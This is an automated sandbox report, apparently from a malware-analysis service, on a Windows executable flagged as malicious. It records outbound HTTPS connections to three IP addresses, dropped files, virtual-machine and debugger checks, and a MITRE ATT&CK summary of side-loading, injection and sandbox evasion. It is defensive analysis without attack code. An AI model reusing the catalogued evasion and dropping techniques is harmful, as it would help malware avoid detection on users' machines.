Source: unknown	HTTPS traffic detected: 43.153.232.151:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 43.152.64.207:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 159.75.57.36:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: 0_2_00EF21B9	0_2_00EF21B9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: 0_2_00EEC3E9	0_2_00EEC3E9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: 0_2_00EEBBE7	0_2_00EEBBE7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: 0_2_00EDFC34	0_2_00EDFC34
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: 0_2_00EE1E80	0_2_00EE1E80

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Code function: String function: 00EDA640 appears 52 times

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 2040

Source: LisectAVT_2403002B_246.exe

Static PE information: invalid certificate

Source: LisectAVT_2403002B_246.exe

Static PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows

Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWABMIG.EXEj% vs LisectAVT_2403002B_246.exe
Source: LisectAVT_2403002B_246.exe	Binary or memory string: OriginalFilenameWABMIG.EXEj% vs LisectAVT_2403002B_246.exe

Source: LisectAVT_2403002B_246.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal68.winEXE@3/18@3/3

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

File created: C:\Program Files (x86)\Everything

Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PluginLauncher[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7336:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7328

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\60a2b6bd-7a18-44fc-9b0c-3365f4b865ed

Jump to behavior

Source: LisectAVT_2403002B_246.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe "C:\Users\user\Desktop\LisectAVT_2403002B_246.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 2040

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: LisectAVT_2403002B_246.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LisectAVT_2403002B_246.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LisectAVT_2403002B_246.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LisectAVT_2403002B_246.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LisectAVT_2403002B_246.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LisectAVT_2403002B_246.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: LisectAVT_2403002B_246.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: LisectAVT_2403002B_246.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wabmig.pdbGCTL source: LisectAVT_2403002B_246.exe
Source:	Binary string: wabmig.pdb source: LisectAVT_2403002B_246.exe
Source:	Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source:	Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source:	Binary string: E:\WorkPlace\AndroidEmulator\7KMarket_Git_Branch_Packet\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: E:\WorkPlace\AndroidEmulator\7KMarket_Git_Branch_Packet\Basic\Client\Output\BinFinal\AppMarket\cef_frame_render.pdb source: PluginLauncher[1].exe.0.dr, Everything.exe.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source:	Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source:	Binary string: C:\Users\Administrator\source\repos\MSASN1\Release\MSASN1.pdb source: LisectAVT_2403002B_246.exe, 00000000.00000003.2000674691.000000000064C000.00000004.00000020.00020000.00000000.sdmp, app_core_legacy.dll.0.dr, MSASN1[1].dll.0.dr

Source: LisectAVT_2403002B_246.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LisectAVT_2403002B_246.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LisectAVT_2403002B_246.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LisectAVT_2403002B_246.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LisectAVT_2403002B_246.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: msvcp140.dll.0.dr

Static PE information: 0x771734A7 [Mon Apr 25 02:38:31 2033 UTC]

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Code function: 0_2_00EDA163 push ecx; ret

0_2_00EDA176

Source: msvcr120[1].dll.0.dr	Static PE information: section name: .text entropy: 6.95576372950548
Source: msvcr120.dll.0.dr	Static PE information: section name: .text entropy: 6.95576372950548

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Program Files (x86)\Everything\msvcp120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcr120[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Program Files (x86)\Everything\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PluginLauncher[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Program Files (x86)\Everything\Everything.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Program Files (x86)\Everything\app_core_legacy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Program Files (x86)\Everything\msvcr120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp120[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	File created: C:\Program Files (x86)\Everything\msvcp140.dll	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\MSASN1[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Everything\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcr120[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PluginLauncher[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Everything\Everything.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Everything\app_core_legacy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcr120.dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp120[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp140.dll	Jump to dropped file

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe TID: 7332

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Code function: 0_2_00EEDEE2 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

0_2_00EEDEE2

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Thread delayed: delay time: 30000

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_246.exe, 00000000.00000002.2194603823.0000000000641000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Code function: 0_2_00EE1021 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00EE1021

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Code function: 0_2_00EF1718 GetProcessHeap,

0_2_00EF1718

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: 0_2_00EE1021 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EE1021
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: 0_2_00EDA417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00EDA417
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: 0_2_00EDA57A SetUnhandledExceptionFilter,	0_2_00EDA57A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: 0_2_00EDA862 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00EDA862

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Code function: 0_2_00EDA685 cpuid

0_2_00EDA685

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: GetLocaleInfoW,	0_2_00EF11B6
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00EF12DF
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: GetLocaleInfoW,	0_2_00EF13E5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00EF14BB
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: EnumSystemLocalesW,	0_2_00EE78F9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: EnumSystemLocalesW,	0_2_00EF0DF2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: EnumSystemLocalesW,	0_2_00EF0DF0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: EnumSystemLocalesW,	0_2_00EF0ED8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: GetLocaleInfoW,	0_2_00EE7E25
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: EnumSystemLocalesW,	0_2_00EF0E3D
Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00EF0F63

Source: C:\Users\user\Desktop\LisectAVT_2403002B_246.exe

Code function: 0_2_00EDA307 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00EDA307

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	2 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
